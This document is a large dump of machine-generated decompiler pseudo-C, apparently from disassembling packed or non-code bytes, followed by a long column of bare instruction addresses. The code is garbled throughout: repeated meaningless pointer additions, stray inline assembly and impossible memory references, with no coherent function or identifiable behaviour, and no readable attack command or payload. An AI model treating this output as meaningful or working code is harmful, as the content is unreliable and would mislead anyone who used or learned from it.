                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x1f04040f)) =  *((intOrPtr*)(_t353 + 0x1f04040f)) + 0xd;
                                                                                                                                                  				 *_t302 =  *_t302 + 0xd;
                                                                                                                                                  				 *[cs:eax] =  *[cs:eax] + 0xd;
                                                                                                                                                  				 *_t302 =  *_t302 + 0xd;
                                                                                                                                                  				_t303 = _t361;
                                                                                                                                                  				_t362 = _t302;
                                                                                                                                                  				_t398[0x8011249] = _t398[0x8011249] + _t353;
                                                                                                                                                  				 *((intOrPtr*)(_t303 + 0x2e)) =  *((intOrPtr*)(_t303 + 0x2e)) + _t362;
                                                                                                                                                  				 *((intOrPtr*)(_t362 - 0x37db2b00)) =  *((intOrPtr*)(_t362 - 0x37db2b00)) + 0xfc000800;
                                                                                                                                                  				_t304 = _t303 + 0x22;
                                                                                                                                                  				 *_t398 =  *_t398 + 0x34;
                                                                                                                                                  				 *_t304 =  *_t304 & _t304;
                                                                                                                                                  				 *_t304 =  *_t304 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *0x315000 =  *0x315000 + _t304;
                                                                                                                                                  				 *_t304 =  *_t304 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t353 - 0x66f07600)) =  *((intOrPtr*)(_t353 - 0x66f07600)) + 0xd;
                                                                                                                                                  				_t305 = _t304 +  *0x211e00;
                                                                                                                                                  				 *_t305 =  *_t305 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t398 =  *_t398 + _t305;
                                                                                                                                                  				 *((intOrPtr*)(_t362 + 0x21)) =  *((intOrPtr*)(_t362 + 0x21)) + _t353;
                                                                                                                                                  				 *_t305 =  *_t305 + 0xd;
                                                                                                                                                  				 *_t305 =  *_t305 + 0xd;
                                                                                                                                                  				 *_t305 =  *_t305 + 0xffffff97;
                                                                                                                                                  				asm("adc [esp+eax], bh");
                                                                                                                                                  				 *[es:edi+0x21] =  *[es:edi+0x21] + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x1110ad00)) =  *((intOrPtr*)(_t353 + 0x1110ad00)) + 0xd;
                                                                                                                                                  				_t306 = _t305 + 0x21aa0027;
                                                                                                                                                  				 *_t306 =  *_t306 + 0xd;
                                                                                                                                                  				 *_t306 =  *_t306 + 0xd;
                                                                                                                                                  				_t307 = _t362;
                                                                                                                                                  				asm("sbb [ecx], bh");
                                                                                                                                                  				_t364 = _t306 &  *_t398;
                                                                                                                                                  				 *_t307 =  *_t307 - 0xd;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t307 =  *_t307 & _t307;
                                                                                                                                                  				 *_t307 =  *_t307 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t307 =  *_t307 + _t364;
                                                                                                                                                  				_t398[8] = _t398[8] + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x4e0f6400)) =  *((intOrPtr*)(_t353 + 0x4e0f6400)) + 0xd;
                                                                                                                                                  				_t365 = _t364 +  *_t307;
                                                                                                                                                  				 *_t398 =  *_t398 + 0x34;
                                                                                                                                                  				 *_t307 =  *_t307 & _t307;
                                                                                                                                                  				 *_t307 =  *_t307 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t365 =  *_t365 + _t365;
                                                                                                                                                  				 *((intOrPtr*)(_t307 + 0x32)) =  *((intOrPtr*)(_t307 + 0x32)) + _t365;
                                                                                                                                                  				 *_t307 =  *_t307 + 0xd;
                                                                                                                                                  				 *_t307 =  *_t307 + 0xd;
                                                                                                                                                  				 *_t307 =  *_t307 + 0x3d;
                                                                                                                                                  				_t308 = _t307 & 0x0029056a;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t308 =  *_t308 & _t308;
                                                                                                                                                  				 *_t308 =  *_t308 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *0xfc000800 =  *0xfc000800 + _t365;
                                                                                                                                                  				_t398[8] = _t398[8] + _t353;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x3c256100)) =  *((intOrPtr*)(_t353 + 0x3c256100)) + 0xd;
                                                                                                                                                  				_t310 = _t308 + 0xfffffffffc00082a;
                                                                                                                                                  				 *_t310 =  *_t310 & _t310;
                                                                                                                                                  				 *_t310 =  *_t310 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t353 - 0x66da9000)) =  *((intOrPtr*)(_t353 - 0x66da9000)) + 0xd;
                                                                                                                                                  				_t366 = _t365 +  *_t353;
                                                                                                                                                  				 *((intOrPtr*)(0xfc000800 + _t398)) =  *((intOrPtr*)(0xfc000800 + _t398)) + _t366;
                                                                                                                                                  				 *_t310 =  *_t310 + 0xffffff84;
                                                                                                                                                  				_t311 = _t310 & 0x002c057f;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t311 =  *_t311 & _t311;
                                                                                                                                                  				 *_t311 =  *_t311 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *0x21e700 =  *0x21e700 + _t366;
                                                                                                                                                  				 *_t311 =  *_t311 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x3c25af00)) =  *((intOrPtr*)(_t353 + 0x3c25af00)) + 0xd;
                                                                                                                                                  				_t312 = _t311 + 0x2d;
                                                                                                                                                  				_t380 = 0xfc000800 + _t353;
                                                                                                                                                  				 *_t312 =  *_t312 & _t312;
                                                                                                                                                  				 *_t312 =  *_t312 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t366 + 0x6e223918)) =  *((intOrPtr*)(_t366 + 0x6e223918)) + _t380;
                                                                                                                                                  				 *_t398 =  *_t398 + _t366;
                                                                                                                                                  				 *_t398 =  *_t398 + 0x34;
                                                                                                                                                  				 *_t312 =  *_t312 & _t312;
                                                                                                                                                  				 *_t312 =  *_t312 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t398 - 0x6cf1dae8)) =  *((intOrPtr*)(_t398 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t398 =  *_t398 + _t366;
                                                                                                                                                  				_t398[8] = _t398[8] + _t380;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + 0x4e25cb00)) =  *((intOrPtr*)(_t353 + 0x4e25cb00)) + 0xd;
                                                                                                                                                  				_t367 = _t366 +  *_t398;
                                                                                                                                                  				 *((intOrPtr*)(_t353 + _t398)) =  *((intOrPtr*)(_t353 + _t398)) + _t312;
                                                                                                                                                  				 *_t312 =  *_t312 + 0xd;
                                                                                                                                                  				 *_t312 =  *_t312 + 0xd;
                                                                                                                                                  				_t354 = _t353 + _t367;
                                                                                                                                                  				 *0x33 =  *0x33 + 0xd;
                                                                                                                                                  				 *0x33 =  *0x33 + 0xd;
                                                                                                                                                  				 *_t389 =  *_t389 + 0xd;
                                                                                                                                                  				_t381 = _t380 - 1;
                                                                                                                                                  				_push(es);
                                                                                                                                                  				_push(es);
                                                                                                                                                  				_t318 = (_t312 ^  *_t312) &  *(_t312 ^  *_t312);
                                                                                                                                                  				 *_t318 =  *_t318 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t367 + 0x6e223918)) =  *((intOrPtr*)(_t367 + 0x6e223918)) + _t381;
                                                                                                                                                  				 *_t389 = _t381 +  *_t389;
                                                                                                                                                  				 *0x33 =  *0x33 + 0x34;
                                                                                                                                                  				 *_t318 =  *_t318 & _t318;
                                                                                                                                                  				 *_t318 =  *_t318 + 0xd;
                                                                                                                                                  				 *0xFFFFFFFF930E254B =  *((intOrPtr*)(0xffffffff930e254b)) + 0xd;
                                                                                                                                                  				 *_t389 = _t381 +  *_t389;
                                                                                                                                                  				 *0xfc000800 =  *0xfc000800 + _t381;
                                                                                                                                                  				_t319 = _t318 &  *_t318;
                                                                                                                                                  				 *_t319 =  *_t319 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t354 - 0x7cd9cc00)) =  *((intOrPtr*)(_t354 - 0x7cd9cc00)) + 0xd;
                                                                                                                                                  				_push(es);
                                                                                                                                                  				asm("aaa");
                                                                                                                                                  				 *((intOrPtr*)(0x33 + _t416)) =  *((intOrPtr*)(0x33 + _t416)) + _t367;
                                                                                                                                                  				 *_t319 =  *_t319 + 0xd;
                                                                                                                                                  				 *_t319 =  *_t319 + 0xd;
                                                                                                                                                  				_t320 = 0x33;
                                                                                                                                                  				_t401 = _t319;
                                                                                                                                                  				 *0x00000059 =  *((intOrPtr*)(0x59)) + _t381;
                                                                                                                                                  				asm("clc");
                                                                                                                                                  				_push(es);
                                                                                                                                                  				if( *0x33 >= 0xd) {
                                                                                                                                                  					 *0x33 =  *0x33 + 0xd;
                                                                                                                                                  					 *0x33 =  *0x33 + 0xd;
                                                                                                                                                  					_t345 = _t401;
                                                                                                                                                  					_t345[0xec1d489] = 0x33 + _t345[0xec1d489];
                                                                                                                                                  					_t345[0xd] = _t345[0xd] + 0x34;
                                                                                                                                                  					 *0xFFFFFFFF8026B233 =  *((intOrPtr*)(0xffffffff8026b233)) + _t381;
                                                                                                                                                  					 *0x3be000 =  *0x3be000 | _t389;
                                                                                                                                                  					 *_t345 =  *_t345 + 0xd;
                                                                                                                                                  					 *0x0D26BE33 =  *((intOrPtr*)(0xd26be33)) + _t381;
                                                                                                                                                  					_t354 = _t354 |  *0x33;
                                                                                                                                                  					 *_t389 =  *_t389 + _t367;
                                                                                                                                                  					_t320 = 0x33;
                                                                                                                                                  					_t401 = _t345;
                                                                                                                                                  					_t401[0x10029a49] = _t401[0x10029a49] + _t354;
                                                                                                                                                  				}
                                                                                                                                                  				 *0x22 =  *0x22 + _t381;
                                                                                                                                                  				_t401[0x1c837bc2] = _t320 + _t401[0x1c837bc2];
                                                                                                                                                  				 *_t354 = _t320 +  *_t354;
                                                                                                                                                  				asm("sbb eax, 0x22");
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x66d8d7f8)) =  *((intOrPtr*)(_t401 - 0x66d8d7f8)) + _t320;
                                                                                                                                                  				_t322 = _t320 +  *_t354 &  *[es:eax];
                                                                                                                                                  				 *_t322 =  *_t322 + _t322;
                                                                                                                                                  				_t401[0x689cc42] = _t401[0x689cc42] + _t322;
                                                                                                                                                  				 *((intOrPtr*)(_t322 + _t322 + 0x2e)) =  *((intOrPtr*)(_t322 + _t322 + 0x2e)) + _t322;
                                                                                                                                                  				_t323 = _t322 &  *_t322;
                                                                                                                                                  				 *_t323 =  *_t323 + _t323;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x77d8c4f8)) =  *((intOrPtr*)(_t401 - 0x77d8c4f8)) + _t323;
                                                                                                                                                  				_t324 = _t323 |  *(_t323 + _t323 + 0x1e);
                                                                                                                                                  				 *_t324 =  *_t324 & _t324;
                                                                                                                                                  				 *_t324 =  *_t324 + _t324;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t324;
                                                                                                                                                  				 *_t412 =  *_t412 + _t324;
                                                                                                                                                  				asm("aaa");
                                                                                                                                                  				_t325 = _t324 &  *_t324;
                                                                                                                                                  				 *_t325 =  *_t325 + _t325;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x72f1dae8)) =  *((intOrPtr*)(_t401 - 0x72f1dae8)) + _t325;
                                                                                                                                                  				_t326 = _t325 |  *_t412;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t326 =  *_t326 & _t326;
                                                                                                                                                  				 *_t326 =  *_t326 + _t326;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t326;
                                                                                                                                                  				 *_t389 =  *_t389 + _t326;
                                                                                                                                                  				_t413 = _t412 - 1;
                                                                                                                                                  				_t327 = _t326 &  *_t326;
                                                                                                                                                  				 *_t327 =  *_t327 + _t327;
                                                                                                                                                  				 *((intOrPtr*)(_t354 - 0x15ed5a00)) =  *((intOrPtr*)(_t354 - 0x15ed5a00)) + _t327;
                                                                                                                                                  				 *_t389 =  *_t389 | _t327;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t327 =  *_t327 & _t327;
                                                                                                                                                  				 *_t327 =  *_t327 + _t327;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t327;
                                                                                                                                                  				 *_t327 =  *_t327 + _t367;
                                                                                                                                                  				asm("pushad");
                                                                                                                                                  				_t328 = _t327 &  *_t327;
                                                                                                                                                  				 *_t328 =  *_t328 + _t328;
                                                                                                                                                  				 *((intOrPtr*)(_t354 - 0x15ed3700)) =  *((intOrPtr*)(_t354 - 0x15ed3700)) + _t328;
                                                                                                                                                  				 *_t328 =  *_t328 | _t367;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t328 =  *_t328 & _t328;
                                                                                                                                                  				 *_t328 =  *_t328 + _t328;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t328;
                                                                                                                                                  				 *_t367 =  *_t367 + _t367;
                                                                                                                                                  				_t329 = _t328 ^ 0x0000003f;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + 0xffffffe2;
                                                                                                                                                  				asm("adc ch, dl");
                                                                                                                                                  				 *_t367 =  *_t367 | _t367;
                                                                                                                                                  				if( *_t367 == 0) {
                                                                                                                                                  					 *_t329 =  *_t329 + _t329;
                                                                                                                                                  					 *_t329 =  *_t329 + _t329;
                                                                                                                                                  					_t227 = _t329;
                                                                                                                                                  					_t329 = _t367;
                                                                                                                                                  					asm("sbb [ecx], bh");
                                                                                                                                                  					_t367 = _t227 &  *_t401;
                                                                                                                                                  					_t381 = _t381 - 1;
                                                                                                                                                  					 *_t401 =  *_t401 + _t354;
                                                                                                                                                  					 *_t329 =  *_t329 & _t329;
                                                                                                                                                  					 *_t329 =  *_t329 + _t329;
                                                                                                                                                  					 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t329;
                                                                                                                                                  					 *_t381 =  *_t381 + _t367;
                                                                                                                                                  					 *_t381 =  *_t381 & 0x00000000;
                                                                                                                                                  					 *_t329 =  *_t329 + 0x2f;
                                                                                                                                                  				}
                                                                                                                                                  				asm("das");
                                                                                                                                                  				asm("adc bl, [edx]");
                                                                                                                                                  				 *_t381 =  *_t381 | _t367;
                                                                                                                                                  				asm("adc ah, [edx]");
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + 0x4c;
                                                                                                                                                  				asm("adc bh, [eax]");
                                                                                                                                                  				 *_t354 =  *_t354 | _t367;
                                                                                                                                                  				 *_t381 = _t416;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + 0x71;
                                                                                                                                                  				asm("adc bh, [ecx+0x8]");
                                                                                                                                                  				 *_t381 = _t381 +  *_t381;
                                                                                                                                                  				 *_t329 =  *_t329 + 0xffffff8e;
                                                                                                                                                  				asm("adc ch, [ebx+0x1e004d08]");
                                                                                                                                                  				 *_t329 =  *_t329 & _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t329;
                                                                                                                                                  				 *_t401 =  *_t401 + _t367;
                                                                                                                                                  				asm("aas");
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + _t329;
                                                                                                                                                  				 *_t329 =  *_t329 + 0xffffffec;
                                                                                                                                                  				asm("adc ecx, ecx");
                                                                                                                                                  				 *_t401 =  *_t401 | _t367;
                                                                                                                                                  				asm("pushfd");
                                                                                                                                                  				_t330 = _t329 &  *_t329;
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				 *((intOrPtr*)(_t367 + 0x6e223918)) =  *((intOrPtr*)(_t367 + 0x6e223918)) + _t381;
                                                                                                                                                  				 *_t389 =  *_t389 + _t367;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t330 =  *_t330 & _t330;
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				 *((intOrPtr*)(_t401 - 0x6cf1dae8)) =  *((intOrPtr*)(_t401 - 0x6cf1dae8)) + _t330;
                                                                                                                                                  				 *_t389 =  *_t389 + _t367;
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				 *_t330 =  *_t330 + 0x26;
                                                                                                                                                  				asm("adc al, 0xc9");
                                                                                                                                                  				 *_t389 =  *_t389 | _t367;
                                                                                                                                                  				asm("int3");
                                                                                                                                                  				asm("aas");
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				 *_t330 =  *_t330 + _t330;
                                                                                                                                                  				_t331 = _t401;
                                                                                                                                                  				_t368 = _t331 + _t367;
                                                                                                                                                  				asm("daa");
                                                                                                                                                  				 *_t354 =  *_t354 - _t368;
                                                                                                                                                  				_push(_t331);
                                                                                                                                                  				_t331[0x10] = _t331 + _t331[0x10];
                                                                                                                                                  				 *_t331 = _t331 +  *_t331;
                                                                                                                                                  				 *_t331 = _t331 +  *_t331;
                                                                                                                                                  				_t332 = _t330;
                                                                                                                                                  				asm("daa");
                                                                                                                                                  				_t383 =  &(_t381[0]) | _t381[0];
                                                                                                                                                  				asm("loopne 0x42");
                                                                                                                                                  				 *_t332 =  *_t332 + _t332;
                                                                                                                                                  				 *_t332 =  *_t332 + _t332;
                                                                                                                                                  				_t333 = _t331;
                                                                                                                                                  				asm("daa");
                                                                                                                                                  				 *_t354 = _t368 + _t332 + _t333;
                                                                                                                                                  				_push(_t413);
                                                                                                                                                  				_t334 = _t333 + _t383;
                                                                                                                                                  				_t372 =  *_t354 + 1;
                                                                                                                                                  				 *_t334 =  *_t334 + _t334;
                                                                                                                                                  				 *_t334 =  *_t334 + _t334;
                                                                                                                                                  				_t335 = _t332;
                                                                                                                                                  				 *0x580bb728 =  *0x580bb728 + _t335;
                                                                                                                                                  				 *_t335 =  *_t335 + _t372;
                                                                                                                                                  				_t384 = _t383 + 1;
                                                                                                                                                  				 *_t335 =  *_t335 + _t335;
                                                                                                                                                  				 *_t335 =  *_t335 + _t335;
                                                                                                                                                  				_t336 = _t334;
                                                                                                                                                  				 *0x5c0bdd28 =  *0x5c0bdd28 + _t336;
                                                                                                                                                  				 *((intOrPtr*)(_t384 + _t336 * 2)) =  *((intOrPtr*)(_t384 + _t336 * 2)) + _t354;
                                                                                                                                                  				 *_t336 =  *_t336 + _t336;
                                                                                                                                                  				 *_t336 =  *_t336 + _t336;
                                                                                                                                                  				_t337 = _t335;
                                                                                                                                                  				_t407 = _t336;
                                                                                                                                                  				 *((intOrPtr*)(_t413 + 0x28)) =  *((intOrPtr*)(_t413 + 0x28)) + _t372;
                                                                                                                                                  				asm("cld");
                                                                                                                                                  				asm("pushfd");
                                                                                                                                                  				_t385 = _t384 + 1;
                                                                                                                                                  				 *_t337 =  *_t337 + _t337;
                                                                                                                                                  				 *_t337 =  *_t337 + _t337;
                                                                                                                                                  				_t338 = _t407;
                                                                                                                                                  				_t373 = _t372 + _t338;
                                                                                                                                                  				asm("daa");
                                                                                                                                                  				_t340 = (_t338 | 0x00000060) + _t385;
                                                                                                                                                  				_t356 = (_t354 |  *_t407) + 1;
                                                                                                                                                  				 *_t340 =  *_t340 + _t340;
                                                                                                                                                  				 *_t340 =  *_t340 + _t340;
                                                                                                                                                  				_t341 = _t337;
                                                                                                                                                  				 *((intOrPtr*)(_t341 + _t413 - 1 + 0x640c5b)) =  *((intOrPtr*)(_t341 + _t413 - 1 + 0x640c5b)) + _t373;
                                                                                                                                                  				 *(_t341 + _t341) =  *(_t341 + _t341) & _t341;
                                                                                                                                                  				 *_t341 =  *_t341 + _t341;
                                                                                                                                                  				_t342 = _t340;
                                                                                                                                                  				_t410 = _t341;
                                                                                                                                                  				 *((intOrPtr*)(_t410 + 0x650c8028)) =  *((intOrPtr*)(_t410 + 0x650c8028)) + _t385;
                                                                                                                                                  				 *((intOrPtr*)(_t342 + 0x44)) =  *((intOrPtr*)(_t342 + 0x44)) + _t385;
                                                                                                                                                  				 *((intOrPtr*)(_t410 - 0x3ad74400)) =  *((intOrPtr*)(_t410 - 0x3ad74400)) + _t385;
                                                                                                                                                  				_t343 = _t342 | 0x00000068;
                                                                                                                                                  				 *_t410 =  *_t410 + _t356;
                                                                                                                                                  				 *_t343 =  *_t343 & _t343;
                                                                                                                                                  				 *_t343 =  *_t343 + _t343;
                                                                                                                                                  				 *((intOrPtr*)(_t410 - 0x6cf1dae8)) =  *((intOrPtr*)(_t410 - 0x6cf1dae8)) + _t343;
                                                                                                                                                  				 *_t373 =  *_t373 + _t373;
                                                                                                                                                  				 *_t343 =  *_t343 + _t343;
                                                                                                                                                  				 *_t343 =  *_t343 + _t343;
                                                                                                                                                  				 *_t343 =  *_t343 + 0xffffffc3;
                                                                                                                                                  				asm("adc al, 0x3c");
                                                                                                                                                  				_t344 = _t343 + 0x69;
                                                                                                                                                  				 *_t410 =  *_t410 + _t356;
                                                                                                                                                  				 *_t344 =  *_t344 & _t344;
                                                                                                                                                  				 *_t344 =  *_t344 + _t344;
                                                                                                                                                  				 *((intOrPtr*)(_t410 - 0x6cf1dae8)) =  *((intOrPtr*)(_t410 - 0x6cf1dae8)) + _t344;
                                                                                                                                                  				 *_t385 =  *_t385 + 0x22;
                                                                                                                                                  				return _t344;
                                                                                                                                                  			}
                                                                                                                                                  0x0106ab5c
                                                                                                                                                  0x0106ab5d
                                                                                                                                                  0x0106ab61
                                                                                                                                                  0x0106ab66
                                                                                                                                                  0x0106ab67
                                                                                                                                                  0x0106ab6a
                                                                                                                                                  0x0106ab6e
                                                                                                                                                  0x0106ab70
                                                                                                                                                  0x0106ab71
                                                                                                                                                  0x0106ab74
                                                                                                                                                  0x0106ab75
                                                                                                                                                  0x0106ab77
                                                                                                                                                  0x0106ab79
                                                                                                                                                  0x0106ab7b
                                                                                                                                                  0x0106ab7d
                                                                                                                                                  0x0106ab83
                                                                                                                                                  0x0106ab85
                                                                                                                                                  0x0106ab87
                                                                                                                                                  0x0106ab89
                                                                                                                                                  0x0106ab8b
                                                                                                                                                  0x0106ab91
                                                                                                                                                  0x0106ab97
                                                                                                                                                  0x0106ab99
                                                                                                                                                  0x0106ab9f
                                                                                                                                                  0x0106aba1
                                                                                                                                                  0x0106aba3
                                                                                                                                                  0x0106aba5
                                                                                                                                                  0x0106aba7
                                                                                                                                                  0x0106abad
                                                                                                                                                  0x0106abaf
                                                                                                                                                  0x0106abb1
                                                                                                                                                  0x0106abb3
                                                                                                                                                  0x0106abb5
                                                                                                                                                  0x0106abbb
                                                                                                                                                  0x0106abbd
                                                                                                                                                  0x0106abbf
                                                                                                                                                  0x0106abc1
                                                                                                                                                  0x0106abc3
                                                                                                                                                  0x0106abc9
                                                                                                                                                  0x0106abcb
                                                                                                                                                  0x0106abd1
                                                                                                                                                  0x0106abd7
                                                                                                                                                  0x0106abd9
                                                                                                                                                  0x0106abdb
                                                                                                                                                  0x0106abdd
                                                                                                                                                  0x0106abdf
                                                                                                                                                  0x0106abe5
                                                                                                                                                  0x0106abe7
                                                                                                                                                  0x0106abe9
                                                                                                                                                  0x0106abeb
                                                                                                                                                  0x0106abed
                                                                                                                                                  0x0106abf3
                                                                                                                                                  0x0106abf5
                                                                                                                                                  0x0106abf8
                                                                                                                                                  0x0106abfa
                                                                                                                                                  0x0106abfc
                                                                                                                                                  0x0106abfd
                                                                                                                                                  0x0106ac05
                                                                                                                                                  0x0106ac06
                                                                                                                                                  0x0106ac08
                                                                                                                                                  0x0106ac0a
                                                                                                                                                  0x0106ac0b
                                                                                                                                                  0x0106ac0e
                                                                                                                                                  0x0106ac10
                                                                                                                                                  0x0106ac17
                                                                                                                                                  0x0106ac1d
                                                                                                                                                  0x0106ac21
                                                                                                                                                  0x0106ac23
                                                                                                                                                  0x0106ac25
                                                                                                                                                  0x0106ac2b
                                                                                                                                                  0x0106ac2e
                                                                                                                                                  0x0106ac31
                                                                                                                                                  0x0106ac33
                                                                                                                                                  0x0106ac39
                                                                                                                                                  0x0106ac3c
                                                                                                                                                  0x0106ac3d
                                                                                                                                                  0x0106ac3f
                                                                                                                                                  0x0106ac41
                                                                                                                                                  0x0106ac47
                                                                                                                                                  0x0106ac4a
                                                                                                                                                  0x0106ac4b
                                                                                                                                                  0x0106ac4d
                                                                                                                                                  0x0106ac4f
                                                                                                                                                  0x0106ac55
                                                                                                                                                  0x0106ac58
                                                                                                                                                  0x0106ac59
                                                                                                                                                  0x0106ac5b
                                                                                                                                                  0x0106ac5d
                                                                                                                                                  0x0106ac63
                                                                                                                                                  0x0106ac66
                                                                                                                                                  0x0106ac68
                                                                                                                                                  0x0106ac6a
                                                                                                                                                  0x0106ac6f
                                                                                                                                                  0x0106ac71
                                                                                                                                                  0x0106ac74
                                                                                                                                                  0x0106ac76
                                                                                                                                                  0x0106ac78
                                                                                                                                                  0x0106ac7a
                                                                                                                                                  0x0106ac7a
                                                                                                                                                  0x0106ac7b
                                                                                                                                                  0x0106ac7d
                                                                                                                                                  0x0106ac7f
                                                                                                                                                  0x0106ac85
                                                                                                                                                  0x0106ac87
                                                                                                                                                  0x0106ac8d
                                                                                                                                                  0x0106ac8f
                                                                                                                                                  0x0106ac95
                                                                                                                                                  0x0106ac9b
                                                                                                                                                  0x0106ac9d
                                                                                                                                                  0x0106ac9f
                                                                                                                                                  0x0106aca1
                                                                                                                                                  0x0106aca3
                                                                                                                                                  0x0106aca9
                                                                                                                                                  0x0106acab
                                                                                                                                                  0x0106acaf
                                                                                                                                                  0x0106acb1
                                                                                                                                                  0x0106acb7
                                                                                                                                                  0x0106acb9
                                                                                                                                                  0x0106acbb
                                                                                                                                                  0x0106acbd
                                                                                                                                                  0x0106acbf
                                                                                                                                                  0x0106acc5
                                                                                                                                                  0x0106acc7
                                                                                                                                                  0x0106acce
                                                                                                                                                  0x0106accf
                                                                                                                                                  0x0106acd5
                                                                                                                                                  0x0106acd8
                                                                                                                                                  0x0106acda
                                                                                                                                                  0x0106acdc
                                                                                                                                                  0x0106acdd
                                                                                                                                                  0x0106ace0
                                                                                                                                                  0x0106ace2
                                                                                                                                                  0x0106ace4
                                                                                                                                                  0x0106ace9
                                                                                                                                                  0x0106acef
                                                                                                                                                  0x0106acf1
                                                                                                                                                  0x0106acf8
                                                                                                                                                  0x0106acf9
                                                                                                                                                  0x0106acfc
                                                                                                                                                  0x0106ad01
                                                                                                                                                  0x0106ad03
                                                                                                                                                  0x0106ad05
                                                                                                                                                  0x0106ad0b
                                                                                                                                                  0x0106ad11
                                                                                                                                                  0x0106ad13
                                                                                                                                                  0x0106ad14
                                                                                                                                                  0x0106ad14
                                                                                                                                                  0x0106ad15
                                                                                                                                                  0x0106ad1b
                                                                                                                                                  0x0106ad1d
                                                                                                                                                  0x0106ad20
                                                                                                                                                  0x0106ad22
                                                                                                                                                  0x0106ad22
                                                                                                                                                  0x0106ad23
                                                                                                                                                  0x0106ad29
                                                                                                                                                  0x0106ad2f
                                                                                                                                                  0x0106ad35
                                                                                                                                                  0x0106ad37
                                                                                                                                                  0x0106ad39
                                                                                                                                                  0x0106ad3b
                                                                                                                                                  0x0106ad3d
                                                                                                                                                  0x0106ad43
                                                                                                                                                  0x0106ad49
                                                                                                                                                  0x0106ad4b
                                                                                                                                                  0x0106ad51
                                                                                                                                                  0x0106ad57
                                                                                                                                                  0x0106ad59
                                                                                                                                                  0x0106ad5f
                                                                                                                                                  0x0106ad61
                                                                                                                                                  0x0106ad64
                                                                                                                                                  0x0106ad66
                                                                                                                                                  0x0106ad68
                                                                                                                                                  0x0106ad6b
                                                                                                                                                  0x0106ad6e
                                                                                                                                                  0x0106ad75
                                                                                                                                                  0x0106ad7b
                                                                                                                                                  0x0106ad80
                                                                                                                                                  0x0106ad82
                                                                                                                                                  0x0106b024
                                                                                                                                                  0x0106b027
                                                                                                                                                  0x0106b029
                                                                                                                                                  0x0106b02c
                                                                                                                                                  0x0106b02e
                                                                                                                                                  0x0106b030
                                                                                                                                                  0x0106b032
                                                                                                                                                  0x0106b035
                                                                                                                                                  0x0106b036
                                                                                                                                                  0x0106b038
                                                                                                                                                  0x0106b039
                                                                                                                                                  0x0106b03b
                                                                                                                                                  0x0106b03c
                                                                                                                                                  0x0106b03e
                                                                                                                                                  0x0106b040
